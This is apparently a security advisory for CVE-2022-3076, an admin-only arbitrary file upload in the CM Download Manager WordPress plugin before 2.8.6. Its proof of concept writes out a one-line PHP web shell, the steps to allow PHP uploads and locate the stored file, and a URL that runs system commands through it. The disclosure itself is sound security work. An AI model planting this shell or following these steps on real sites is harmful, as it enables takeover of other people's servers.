CM Download Manager < 2.8.6 – Admin+ Arbitrary File Upload | CVE 2022-3076

Description

The plugin allows high privilege users such as admin to upload arbitrary files by setting the any extension via the plugin's setting, which could be used by admins of multisite blog to upload PHP files for example.

Proof of Concept

##########################
Activate PHP extension:
##########################

- Log in and go to "CM Downloads" > "Settings" > "General".

- Now you can simply add php extension to "Allowed file extensions:" field because the plugin does not check for php extension.

##################################
Upload our malicious PHP file:
##################################

- Go to "CM Downloads" > "Add New".

- Upload our malicious file :

	For example : malicious_php.php 
	<?=`$_GET[cmd]`?>

##########################
Find the right path:
##########################

We have two methods here because the code looks like:

   $name = time() . '_' . sanitize_file_name($_download_file['name']);

But we don't need to write a script, we can exploit this more easily:

- Go to "CM Downloads" > "CM Downloads".
- Click on "Edit" on the name we gave to our Download and now we are redirect on a page.
- We need to get the id present in the url for the following : http://target/cmdownload/edit/id/7/ => so here it's 7
- We can find the name of our malicious file below the "Browse" button : 1660921772_malicious_php.php
- So now we can execute system command:

 => target/wp-content/uploads/cmdm/id/filename

 https://target/wp-content/uploads/cmdm/7/1660921772_malicious_php.php?cmd=command